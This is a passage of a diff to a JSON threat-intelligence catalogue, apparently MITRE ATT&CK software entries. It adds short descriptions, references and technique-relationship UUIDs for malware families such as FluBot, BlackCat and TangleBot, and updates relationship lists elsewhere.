+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6836813e-8ec8-4375-b459-abb388cb1a35",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "5faaf81a-aa5b-4a4b-bae5-522439e068f8",
+ "value": "DarkTortilla - S1066"
+ },
{
"description": "[FoggyWeb](https://attack.mitre.org/software/S0661) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least early April 2021.(Citation: MSTIC FoggyWeb September 2021)",
"meta": {
@@ -39176,6 +41591,125 @@
"uuid": "72911fe3-f085-40f7-b4f2-f25a4221fe44",
"value": "FoggyWeb - S0661"
},
+ {
+ "description": "[FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)",
+ "meta": {
+ "external_id": "S1067",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1067",
+ "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/",
+ "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon"
+ ],
+ "synonyms": [
+ "FluBot"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "16d73b64-5681-4ea0-9af4-4ad86f7c96e8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "24a77e53-0751-46fc-b207-99378fb35c08",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aa78dfd-cb6f-4c70-9408-137cfd96be49",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32063d7f-0a39-440d-a4a3-2694488f96cc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "39dd7871-f59b-495f-a9a5-3cb8cc50c9b2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "5ca3c7ec-55b2-4587-9376-cf6c96f8047a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dc01774a-d1c1-45fb-b506-0a5d1d6593d9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fd211238-f767-4599-8c0d-9dca36624626",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "f5ff006c-702f-4ded-8e60-ca6c540d91bc",
+ "value": "FluBot - S1067"
+ },
{
"description": "[HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)",
"meta": {
@@ -39564,6 +42098,171 @@
"uuid": "f464354c-7103-47c6-969b-8766f0157ed2",
"value": "FIVEHANDS - S0618"
},
+ {
+ "description": "[BlackCat](https://attack.mitre.org/software/S1068) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://attack.mitre.org/software/S1068) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)(Citation: ACSC BlackCat Apr 2022)",
+ "meta": {
+ "external_id": "S1068",
+ "mitre_platforms": [
+ "Linux",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1068",
+ "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/",
+ "https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat",
+ "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/"
+ ],
+ "synonyms": [
+ "BlackCat",
+ "ALPHV",
+ "Noberus"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "fb640c43-aa6b-431e-a961-a279010424ac",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "50c44c34-3abb-48ae-9433-a2337de5b0bc",
+ "value": "BlackCat - S1068"
+ },
{
"description": "[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)",
"meta": {
@@ -40108,6 +42807,110 @@
"uuid": "5c6ed2dc-37f4-40ea-b2e1-4c76140a388c",
"value": "PUNCHBUGGY - S0196"
},
+ {
+ "description": "[TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)",
+ "meta": {
+ "external_id": "S1069",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1069",
+ "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19"
+ ],
+ "synonyms": [
+ "TangleBot"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1d1b1558-c833-482e-aabb-d07ef6eae63d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "351ddf79-2d3a-41b4-9bef-82ea5d3ccd69",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "73c26732-6422-4081-8b63-6d0ae93d449e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b327a9c0-e709-495c-aa6e-00b042136e2b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d8940e76-f9c1-4912-bea6-e21c251370b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e1c912a9-e305-434b-9172-8a6ce3ec9c4a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "68156e5a-4c3a-46dd-9c5e-c0bfdec6651f",
+ "value": "TangleBot - S1069"
+ },
{
"description": "[Neoichor](https://attack.mitre.org/software/S0691) is C2 malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) since at least 2019; similar malware families used by the group include Leeson and Numbldea.(Citation: Microsoft NICKEL December 2021)",
"meta": {
@@ -40564,6 +43367,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"tags": [
@@ -41181,13 +43991,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -41196,14 +43999,14 @@
"type": "uses"
},
{
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
+ "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -41241,6 +44044,9 @@
"refs": [
"http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/",
"https://attack.mitre.org/software/S0322"
+ ],
+ "synonyms": [
+ "HummingBad"
]
},
"related": [
@@ -43545,6 +46351,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -43615,13 +46428,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -43649,13 +46455,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
@@ -44339,13 +47138,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -44867,6 +47659,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -45231,13 +48030,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -45784,13 +48576,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b",
@@ -45931,6 +48716,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -46938,6 +49730,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -47523,13 +50322,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
"tags": [
@@ -47558,6 +50350,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -47690,13 +50489,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
@@ -48471,6 +51263,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -49390,13 +52189,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -49936,13 +52728,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -50028,6 +52813,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -50513,8 +53305,8 @@
"Windows"
],
"refs": [
- "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
- "https://attack.mitre.org/software/S0672"
+ "https://attack.mitre.org/software/S0672",
+ "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf"
],
"synonyms": [
"Zox",
@@ -51005,6 +53797,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -51061,13 +53860,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
"tags": [
@@ -51082,6 +53874,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -51347,14 +54146,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -51750,13 +54549,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "518bb5f1-91f4-4ff2-b09d-5a94e1ebe95f",
@@ -52545,13 +55337,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -52792,6 +55577,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
"tags": [
@@ -52971,13 +55763,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "43155329-3edf-47a6-9a14-7dac899b01e4",
@@ -54017,6 +56802,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -54253,13 +57045,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "b45747dc-87ca-4597-a245-7e16a61bc491",
@@ -55948,13 +58733,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -57349,13 +60127,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -57404,13 +60175,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "d906e6f7-434c-44c0-b51a-ed50af8f7945",
@@ -58106,7 +60870,8 @@
"meta": {
"external_id": "S0663",
"mitre_platforms": [
- "Windows"
+ "Windows",
+ "Linux"
],
"refs": [
"https://attack.mitre.org/software/S0663",
@@ -58134,6 +60899,48 @@
],
